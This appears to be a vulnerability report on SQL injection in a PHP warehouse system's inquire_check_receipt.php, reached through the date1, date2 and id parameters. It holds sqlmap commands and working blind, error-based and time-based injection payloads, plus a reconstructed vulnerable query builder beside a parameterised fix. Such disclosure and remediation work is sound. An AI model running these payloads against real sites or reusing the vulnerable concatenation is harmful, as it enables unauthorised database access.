wms
SQL injection in /test/inquire_check_receipt.php
How can there be so many SQL injections in one file?
Lines 6-30
When the GET parameter 'option' is 'date', two more GET parameters, 'date1' and 'date2', are read. The $limit_string variable assigned in the branches below is a fragment of the SQL statement concatenated with either 'date1' or 'date2', and it is then carried to lines 23-30, where it is executed as part of the SQL statement.
There are three scenarios, each tested directly with sqlmap:
python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_check_receipt.php?option=date&date1=1" -p "date1" --batch --risk=3 --level=5 --dbms=mysql -dbs
Parameter: date1 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=date&date1=1' AND 5409=5409-- tQWr
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=date&date1=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(8708=8708,1))),0x7178626b71),8708)-- ZcIx
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh
python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_check_receipt.php?option=date&date2=1" -p "date2" --batch --risk=3 --level=5 --dbms=mysql -dbs
Parameter: date2 (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: option=date&date2=1' OR NOT 3035=3035-- mDFK
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=date&date2=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(7937=7937,1))),0x7178626b71),7937)-- UdHZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=date&date2=1' AND (SELECT 1667 FROM (SELECT(SLEEP(5)))SELQ)-- xLBv
python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_check_receipt.php?option=date&date1=1&date2=1" -p "date1,date2" --batch --risk=3 --level=5 --dbms=mysql -dbs
Parameter: date2 (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: option=date&date2=1' OR NOT 3035=3035-- mDFK
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=date&date2=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(7937=7937,1))),0x7178626b71),7937)-- UdHZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=date&date2=1' AND (SELECT 1667 FROM (SELECT(SLEEP(5)))SELQ)-- xLBv
Parameter: date1 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=date&date1=1' AND 5409=5409-- tQWr
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=date&date1=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(8708=8708,1))),0x7178626b71),8708)-- ZcIx
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh
There is also a further case: when the parameter 'option' is 'warehouse', the GET variable 'id' is likewise concatenated into $limit_string and used in the subsequent SQL query, which is essentially the same pattern as above.
python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_check_receipt.php?option=warehouse&id=1" -p "id" --batch --risk=3 --level=5 -dbs
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: option=warehouse&id=1' OR NOT 5735=5735-- ytFp
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=warehouse&id=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(3839=3839,1))),0x7178626b71),3839)-- Rtmw
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=warehouse&id=1' AND (SELECT 2885 FROM (SELECT(SLEEP(5)))lRDE)-- VIXY
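As an added example (not the project's code, which this report references only by line number), the concatenation pattern described for the 'date' and 'warehouse' branches, reconstructed as an assumption, beside a hardened version that fixes the SQL text, validates each value and binds it as a parameter. Table and column names (check_receipt, check_date, warehouse_id) are assumptions.

```php
<?php
// Added example, not the project's code. The vulnerable function is a
// reconstruction of the pattern the report describes (an assumption), as are
// the table and column names.

// Vulnerable pattern: request values become part of the SQL text, so a
// single quote in date1, date2 or id rewrites the statement.
function build_query_vulnerable(array $get): string {
    $option = $get['option'] ?? '';
    $limit_string = '';
    if ($option === 'date') {
        if (isset($get['date1'])) { $limit_string .= " AND check_date >= '" . $get['date1'] . "'"; }
        if (isset($get['date2'])) { $limit_string .= " AND check_date <= '" . $get['date2'] . "'"; }
    } elseif ($option === 'warehouse') {
        $limit_string .= " AND warehouse_id = '" . ($get['id'] ?? '') . "'";
    }
    return 'SELECT * FROM check_receipt WHERE 1=1' . $limit_string;
}

// Hardened version: the SQL text is fixed, every request value is validated
// and bound as a parameter, and unknown options are rejected.
function query_check_receipt(PDO $pdo, array $get): array {
    $sql = 'SELECT * FROM check_receipt WHERE 1=1';
    $params = [];
    switch ($get['option'] ?? '') {
        case 'date':
            foreach (['date1' => '>=', 'date2' => '<='] as $name => $op) {
                if (!isset($get[$name])) { continue; }
                // Only a YYYY-MM-DD value may reach the database.
                if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $get[$name])) {
                    throw new InvalidArgumentException("invalid $name");
                }
                $sql .= " AND check_date $op :$name";
                $params[":$name"] = $get[$name];
            }
            break;
        case 'warehouse':
            $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT);
            if ($id === false) { throw new InvalidArgumentException('invalid id'); }
            $sql .= ' AND warehouse_id = :id';
            $params[':id'] = $id;
            break;
        default:
            throw new InvalidArgumentException('unknown option');
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

With the hardened version, the sqlmap payloads above fail the format check before any query is built, and even a value that passes it reaches MySQL as data rather than as SQL.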